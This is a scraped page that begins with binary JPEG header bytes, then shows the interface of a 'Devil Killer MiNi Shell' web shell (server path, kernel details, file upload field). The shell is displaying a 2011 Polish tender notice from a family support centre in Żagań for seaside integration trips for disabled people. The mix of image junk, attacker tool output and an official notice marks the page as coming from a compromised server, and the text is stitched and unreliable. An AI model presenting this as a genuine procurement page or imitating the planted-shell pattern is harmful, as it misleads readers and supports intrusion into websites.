JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110419/119057-N-2011.html

<p class="kh_header"><b>Żagań: usługi związane z organizacją integracyjnego wyjazdu osób niepełnosprawnych połączonego ze specjalistycznym poradnictwem w ramach realizacji projektu pod nazwą  Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Żaganiu</b><br>
<b>Numer ogłoszenia: 119057 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. Śląska 1, 68-100 Żagań, woj. lubuskie, tel. 068 477 77 71-78, 95-97, faks 068 477 77 74.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi związane z organizacją integracyjnego wyjazdu osób niepełnosprawnych połączonego ze specjalistycznym poradnictwem w ramach realizacji projektu pod nazwą  Rozwój i upowszechnianie aktywnej integracji przez Powiatowe Centrum Pomocy Rodzinie w Żaganiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Organizacja wyjazdu integracyjnego osób niepełnosprawnych połączonego ze specjalistycznym poradnictwem w następującym zakresie:

GRUPA I
1.	Termin realizacji zamówienia - czas trwania wyjazdu: 7dni, termin: II połowa lipca
2.	Liczba osób ogółem: 28 osób, w tym:
- liczba osób niepełnosprawnych: 25, w tym 1 osoba na wózku inwalidzkim
- liczba opiekunów: 2
- pracownik PCPR: 1
3.	Istotne warunki zamówienia: 
a)	miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km, 
b)	transport - z Żagania na miejsce pobytu i z powrotem,
c)	wyżywienie przez cały okres pobytu: 
- śniadanie: 168 sztuk ( 28 osób x 6 dni),
- obiad: 196 sztuk ( 28 osób x 7 dni),
- kolacja: 196 sztuk ( 28 osób x 7 dni, w tym ognisko i grill),
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami: 9 przerw z poczęstunkiem (kawa, herbata, woda, soki, ciastka), 7 przerw bez poczęstunku. Ogółem 16 przerw.

Pierwszy dzień pobytu uczestników rozpocznie się obiadem zaś  ostatni dzień zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
d) nocleg - 6 noclegów w min. 3 gwiazdkowym hotelu, w pokojach max. 3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd, pokoje z łazienkami, ze sprzętem RTV  w ośrodku o podwyższonym standardzie z przystosowaniem dla osób z trudnościami w poruszaniu się, w tym dla osób poruszających się na wózkach inwalidzkich,
e) ubezpieczenie uczestników ( NW),
f) stała opieka pielęgniarska,
g) stała opieka lekarska,
h) ćwiczenia usprawniające psychoruchowo (grupowe) -  1 h zegarowa dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt,
i) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa,
j) dwukrotne badanie lekarskie dla każdego uczestnika: pierwsze - na którym lekarz ordynuje zabiegi, drugie - końcowe, podsumowujące efekty zastosowanych ćwiczeń,
k) poradnictwo grupowe z zakresu doradztwa zawodowego - 8 h lekcyjnych (nauka poprawnego pisania CV, listu motywacyjnego, zapoznanie z aktywnymi metodami poszukiwania pracy, diagnoza zainteresowań, wartości, uzdolnień i motywacji , badanie predyspozycji zawodowych i kompetencji),
l) zajęcia grupowe z psychologiem - 8 h  lekcyjnych- minimalny zakres tematyczny zajęć z psychologiem ( z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego) : bloki tematyczne to asertywność i autoprezentacja - nauka wyrażania własnych uczuć, egzekwowanie swoich praw oraz szanowanie praw innych, emocjonalne oraz społeczne konsekwencje postawy uległej, agresywnej i bierno-agresywnej, zabawy integracyjne umożliwiające samoocenę asertywności, mapa asertywności,
ł) zajęcia indywidualne z doradcą zawodowym - liczba godzin wg indywidualnych potrzeb każdego uczestnika określona przez osobę prowadzącą zajęcia  - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
m) zajęcia indywidualne z psychologiem z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
n) grupowe zajęcia z zakresu znajomości praw osób niepełnosprawnych (osoba prowadząca: osoba uprawniona z zakresu znajomości praw osób niepełnosprawnych) - 4 h lekcyjne ( karta praw osób niepełnosprawnych, zasady zatrudniania osób niepełnosprawnych: prawa i obowiązki pracownika i pracodawcy, zadania urzędu pracy z zakresu zatrudniania i samozatrudnienia osób niepełnosprawnych) - uzupełnienie tematyki wg potrzeb uczestników,
o) zajęcia integracyjne ( np. ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
p) wycieczka autokarowa połączona ze zwiedzaniem okolic, wraz z przewodnikiem
r) warsztaty taneczne,
s) warsztaty dodatkowe: warsztaty z wizażu - 4h zegarowe,
t) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 28 osób, wraz z niezbędnymi materiałami (tablica, papier do pisania, rzutnik multimedialny itp.),
u) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora)

GRUPA II

1.	Termin realizacji zamówienia -czas trwania wyjazdu: 7dni,termin; przełom lipca i sierpnia 2011 r.
2.	Liczba osób ogółem: 33 osób w tym:
- liczba osób niepełnosprawnych: 25, w tym 2 osoby na wózku inwalidzkim
- liczba opiekunów: 5
- liczba osób będących OTOCZENIEM* - 2 osoby
- pracownik PCPR: 1
3.	Istotne warunki zamówienia: 
a)	miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km, 
b)	transport - z Żagania na miejsce pobytu i z powrotem, 
c)	wyżywienie przez cały okres pobytu: 
- śniadanie: 198 sztuk ( 33 osób x 6 dni)
- obiad: 231 sztuk ( 33 osób x 7 dni)
- kolacja: 231 sztuk ( 33 osób x 7 dni w tym ognisko i grill)
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami: 9 przerw z poczęstunkiem (kawa, herbata, woda, soki, ciastka), 7 przerw bez poczęstunku. Ogółem 16 przerw.
Pierwszy dzień pobytu uczestników rozpocznie się obiadem zaś  ostatni dzień zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
d) nocleg - 6 noclegów w min. 3 gwiazdkowym hotelu, w pokojach max. 3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd, pokoje z łazienkami, ze sprzętem RTV  w ośrodku o podwyższonym standardzie z przystosowaniem dla osób z trudnościami w poruszaniu się w tym dla osób poruszających się na wózkach inwalidzkich,
e) ubezpieczenie uczestników ( NW),
f) stała opieka pielęgniarska,
g) stała opieka lekarska,
h) ćwiczenia usprawniające psychoruchowo (grupowe) -  1 h zegarowa dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt
i) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa
j) dwukrotne badanie lekarskie dla każdego uczestnika: pierwsze - na którym lekarz ordynuje zabiegi, drugie - końcowe, podsumowujące efekty zastosowanych ćwiczeń,
k) poradnictwo grupowe z zakresu doradztwa zawodowego - 8 h lekcyjnych (nauka poprawnego pisania CV, listu motywacyjnego, zapoznanie z aktywnymi metodami poszukiwania pracy, diagnoza zainteresowań, wartości, uzdolnień i motywacji, badanie predyspozycji zawodowych),
l) zajęcia grupowe z psychologiem - 8 h lekcyjnych na grupę  - minimalny zakres tematyczny zajęć z psychologiem ( z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego) : minimalny zakres tematyczny zajęć z psychologiem ( z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego) : bloki tematyczne to nawiązywanie relacji interpersonalnych, komunikacja - odkrywanie własnych barier utrudniających uważne słuchanie - najpierw słuchaj potem mów, cechy dobrej komunikacji, mowa ciała,
ł) zajęcia indywidualne z doradcą zawodowym - liczba godzin wg indywidualnych potrzeb każdego uczestnika określona przez osobę prowadzącą zajęcia  - nie mniej niż 1,5h zegarowej  nie więcej niż 3h zegarowe na 1 osobę,
m) zajęcia indywidualne z psychologiem z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h  zegarowej nie więcej niż 3h zegarowe na 1 osobę,
n) zajęcia indywidualne z psychologiem dla OTOCZENIA - nie mniej niż 2h zegarowe nie więcej niż 4h zegarowe na 1 osobę,
o) grupowe zajęcia z zakresu znajomości praw osób niepełnosprawnych (osoba prowadząca: osoba uprawniona z zakresu znajomości praw osób niepełnosprawnych) - 4 h lekcyjne (karta praw osób niepełnosprawnych, programy celowe PFRON, np. STUDENT, KOMPUTER DLA HOMERA, PEGAZ i inne - jakie wnioski, gdzie składać, kiedy itp.; zadania urzędów pracy z zakresu zatrudnienia i samozatrudnienia osób niepełnosprawnych; możliwość uzupełnienia tematyki wg potrzeb uczestników),
p) zajęcia integracyjne ( np. ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
r) wycieczka autokarowa połączona ze zwiedzaniem okolic, wraz z przewodnikiem
s) warsztaty taneczne,
t) warsztaty dodatkowe: warsztaty z decoupage - 4h zegarowe,
u) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 33 osób, wraz z niezbędnymi materiałami ( tablica, papier do pisania, rzutnik multimedialny itp.),
w) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora)

* OTOCZENIE - osoby, które w ramach wyjazdu zostaną objęte wsparciem w zakresie indywidualnych zajęć z psychologiem; dla tych osób należy sporządzić dokumentację z odbytych zajęć.

GRUPA III
1. Termin realizacji zamówienia: czas trwania wyjazdu- 7dni,termin:;przełom sierpnia i września 2011 r.
2. Liczba osób ogółem: 26 osób, w tym:
- liczba osób niepełnosprawnych: 25, w tym 1 osoba na wózku inwalidzkim
- liczba opiekunów: 0
- pracownik PCPR : 1
3.Istotne warunki zamówienia: 
a)   miejsce: miejscowość nadmorska położona w maksymalnej odległości od Żagania: 600km, 
b)	liczba osób: 26
c)	transport - z Żagania na miejsce pobytu i z powrotem,
d)	wyżywienie przez cały okres pobytu: 
- śniadanie: 156 sztuk ( 26 osób x 6 dni)
- obiad: 182 sztuk ( 26 osób x 7 dni)
- kolacja: 182 sztuk ( 26 osób x 7 dni w tym ognisko i grill)
- poczęstunek podczas przerw kawowych w trakcie trwania zajęć ze specjalistami: 9 przerw z poczęstunkiem (kawa, herbata, woda, soki, ciastka), 7 przerw bez poczęstunku. Ogółem 16 przerw.
Pierwszy dzień pobytu uczestników rozpocznie się obiadem zaś  ostatni dzień zakończy się  obiadem. Dodatkowo uczestnicy otrzymają prowiant na drogę powrotną.
e) nocleg - 6 noclegów w min. 3 gwiazdkowym hotelu, w pokojach max. 3 osobowych oraz 1 pokój jednoosobowy dla pracownika koordynującego wyjazd z łazienkami, ze sprzętem RTV  w ośrodku o podwyższonym standardzie z przystosowaniem dla osób z trudnościami w poruszaniu się w tym dla osób poruszających się na wózkach inwalidzkich,
f) ubezpieczenie uczestników ( NW),
g) stała opieka pielęgniarska,
h) stała opieka lekarska,
i) ćwiczenia usprawniające psychoruchowo (grupowe) -  1 h dziennie przez 5 dni dla każdego uczestnika, prowadzone w sali przystosowanej do tego typu zajęć, wyposażonej w niezbędny sprzęt
j) wspólne zajęcia ruchowe na plaży - nie mniej niż 0,5h zegarowej i nie więcej niż 1h zegarowa,
k) dwukrotne badanie lekarskie dla każdego uczestnika: pierwsze - na którym lekarz ordynuje zabiegi, drugie - końcowe, podsumowujące efekty zastosowanych ćwiczeń,
l) poradnictwo grupowe z zakresu doradztwa zawodowego - 8 h lekcyjnych (nauka poprawnego pisania CV i listu motywacyjnego, pomoc w kontekście rozwoju własnej kariery, wsparcie w podejmowaniu decyzji dot. planowania zawodu, wyboru lub zmiany zawodu),
ł) zajęcia grupowe z psychologiem - 8 h lekcyjnych na grupę  - minimalny zakres tematyczny zajęć z psychologiem ( z możliwością poszerzenia wg potrzeb grupy zaobserwowanych przez prowadzącego) : bloki tematyczne to kontrola emocjonalna, radzenie sobie ze stresem - wyjaśnienie pojęć: emocje, stres, skutki sytuacji trudnych; budowa umiejętności radzenia sobie z emocjami, sytuacjami trudnymi i konkretne metody radzenia sobie w sytuacjach trudnych, stresujących;
m) zajęcia indywidualne z doradca zawodowym - liczba godzin wg indywidualnych potrzeb każdego uczestnika określona przez osobę prowadzącą zajęcia  - nie mniej niż 1,5h zegarowej nie więcej niż 3h zegarowe na 1 osobę,
n) zajęcia indywidualne z psychologiem z określeniem metryczki osobowościowej dla uczestników - nie mniej niż 1,5h zegarowej  nie więcej niż 3h zegarowe na 1 osobę,
o) grupowe zajęcia z zakresu znajomości praw osób niepełnosprawnych (osoba prowadząca: osoba uprawniona z zakresu znajomości praw osób niepełnosprawnych) - 4 h lekcyjne (karta praw osób niepełnosprawnych, procedura dofinansowań i wsparcia finansowego wynikających z ustawy o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, zadania urzędów pracy z zakresu zatrudnienia i samozatrudnienia osób niepełnosprawnych, możliwość uzupełnienia tematyki wg potrzeb uczestników),
p) zajęcia integracyjne ( np. ognisko, wycieczki piesze, zajęcia sportowe, konkursy itp.),
r) wycieczka autokarowa połączona ze zwiedzaniem okolic, wraz z przewodnikiem
s) warsztaty taneczne,
t) warsztaty dodatkowe: warsztaty z wizażu - 4h zegarowe,
u) zapewnienie sali przystosowanej do prowadzenia zajęć grupowych na 26 osób, wraz z niezbędnymi materiałami ( tablica, papier do pisania, rzutnik multimedialny itp.),
w) wskazanie osoby odpowiedzialnej za pobyt z ramienia wykonawcy ( organizatora).

2. Ramowy harmonogram organizacyjny dla wszystkich grup przedstawia się następująco :
Dzień pierwszy :

5:45			zbiórka  na placu k/ koło Lidla w Żaganiu
6:00			wyjazd do ośrodka
12:00			przyjazd i zakwaterowanie
13:00  do 13:45		obiad 
14:00  do 14:45		grupowe zajęcia z doradcą zawodowym
14:45  do 14:55		przerwa 
14:55  do 15:40		grupowe zajęcia z doradcą zawodowym
15:40  do 15:50		przerwa kawowa
15:50  do 16:35		grupowe zajęcia z doradcą zawodowym
16:35  do 19:00		czas na relaks (basen, sauna, ścianka wspinaczkowa itp.)
19:00			ognisko (kolacja) 
W godzinach między :16:30 do 21:30 indywidualne zajęcia z psychologiem i doradcą zawodowym 
Dzień drugi
6:30			pobudka
7:00 do 7:45		zajęcia ruchowe wspólne na plaży
8:00 do 8:30		śniadanie
9:00 do 9:45		grupowe  zajęcia z psychologiem
9:45 do 9:55		przerwa 
9:55 do10:40		grupowe zajęcia z psychologiem
10:40 do11:00		przerwa kawowa
11:00 do 11:45		grupowe zajęcia z  doradcą zawodowym
11:45 do11:55		przerwa 
11:55  do 12:35		grupowe zajęcia z doradcą zawodowym
13:00  do 13:45		obiad
13:45  do 14:45		ćwiczenia usprawniające psychoruchowo
15:30  do 18:30		wycieczka 
19:00  do 19:30		kolacja
19:40  do 21:40		warsztaty taneczne z nauką tańca
Trzeci dzień
6:30    			pobudka
7:00 do 7:45		wspólne ćwiczenia ruchowe na plaży
8:00 do 8:30		śniadanie
9:00 do 9:45		zajęcia z doradcą zawodowym
9:45 do 9:55		przerwa 
9:55 do10:40		zajęcia z doradcą zawodowym
10:40 do 10:50		przerwa kawowa
10:50 do 11:35		zajęcia z doradcą zawodowym
12:00 do 13:00		ćwiczenia usprawniające psychoruchowo
13:15 do 14:00		obiad
14:30 do16:30		zajęcia z  decoupage ( 2 godz. zegarowe) 
16:30 do 16:45		przerwa kawowa
16:45 do 18:45		zajęcia z decoupage   ( 2 godz. zegarowe)
19:00 do 19:30		kolacja 
19:40 do 21:30		karaoke
W godzinach od 14:30 do 21:30  - indywidualne zajęcia z psychologiem i doradcą zawodowym
Dzień czwarty
6:30			pobudka
7:00 do 7:45		wspólne zajęcia ruchowe na plaży
8:00 do 8:30		śniadanie
9:00 do 9:45		grupowe zajęcia z psychologiem
9:45 do 9:55		przerwa
9:55 do 10:40		grupowe  zajęcia z psychologiem
10:40 do 11:00		przerwa kawowa
11:00 do 11:45		grupowe zajęcia z psychologiem
11:45 do 11:55		przerwa
11:55 do 12 :40		grupowe zajęcia z psychologiem
13:00 do 13:45		obiad
14:00 do 17:00		wycieczka
17:30 do 18:30 		ćwiczenia usprawniające psychoruchowo
19:00 do 19:30		kolacja
19:40 do 21:40		warsztaty taneczne z nauką tańca
W godzinach  od 14:00 do 21:00 - indywidualne zajęcia z psychologiem i doradcą.

Dzień piąty
6:00			pobudka
7:00 do 7:45		wspólne zajęcia ruchowe na plaży
8:00 do 8:30		śniadanie
9:00 do 9:45		grupowe zajęcia  z psychologiem
9:45 do 9:55		przerwa 
9:55 do  10:40		grupowe zajęcia z psychologiem
10:40 do 11:00		przerwa kawowa
11:00 do 12:00		ćwiczenia usprawniające 
12:00 do 13:00		czas wolny
13:00 do 13:45		obiad
14:00 do 18:00		wypoczynek na plaży
18:00 do 19:00		czas wolny
19:00 do 21:00		grill
 W godzinach od 14:00  - 21:00 indywidualne spotkania z psychologiem i doradcą 

Dzień szósty

6:30			pobudka
7:00 do 7:45		wspólne zajęcia na plaży
8:00 do 8:30		śniadanie
9:00 do 9:45		zajęcia z zakresu znajomości praw osób niepełnosprawnych 
9:45 do 9:55		przerwa
9:55 do 10:40		zajęcia z zakresu znajomości praw osób niepełnosprawnych
10:40 do 11:00		przerwa kawowa
11:00 do 12:00		ćwiczenia usprawniające psychoruchowo
12:00 do 13:00		czas wolny
13:00 do 13:45		obiad
14:00 do 14:45		zajęcia z zakresu znajomości praw  osób niepełnosprawnych
14:45 do 14:55		przerwa
14:55 do 15:40		zajęcia  z zakresu znajomości praw  osób niepełnosprawnych
16:00 do 19:00		wycieczka
19:00 do 19:30		kolacja
19:40 do 21:40		warsztaty taneczne z nauką tańca
W godzinach od 16:00 do 21:00 - możliwość indywidualnych spotkań z psychologiem i doradcą zawodowym.
Dzień siódmy
6:30			pobudka
7:00 do 7:45		zajęcia ruchowe na plaży
8:00 do 8:30		 śniadanie	
9:00 do 10:00		spotkanie z kadrą ośrodka 
10:00 do 13:00		spacer po okolicy i plaży
13:00 do 13:45		obiad
14:00 do 15:00		przygotowanie do wyjazdu  ( zaprowiantowanie na wyjazd)
   15:00			wyjazd powrót do Żagania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć wykaz osób które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnymi za świadczenie usług (dotyczy psychologa, doradcy zawodowego, rehabilitanta, lekarza i pielęgniarki), wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informację o podstawie do dysponowania tymi osobami - wg wzoru stanowiącego załącznik nr 4 do SIWZ.
Ocena warunków zostanie dokonana na podstawie załączonych do oferty dokumentów i oświadczeń zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty należy dołączyć opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000 zł brutto. Jeżeli przedstawiona polisa nie została opłacona w dniu jej zawarcia (gotówką) celem udokumentowania jej opłaty należy przedłożyć np. dowód jej opłaty względnie poszczególnych rat. W przypadku składania oferty przez Wykonawców występujących wspólnie warunek musi być spełniony przez każdego Wykonawcę. Warunek wysokości sumy ubezpieczenia zostanie uznany przez Zamawiającego za spełniony , jeżeli Wykonawcy składający ofertę wspólną będą spełniać go łącznie. 
Ocena warunków zostanie dokonana na podstawie załączonych do oferty dokumentów i oświadczeń zgodnie z formułą spełnia-nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

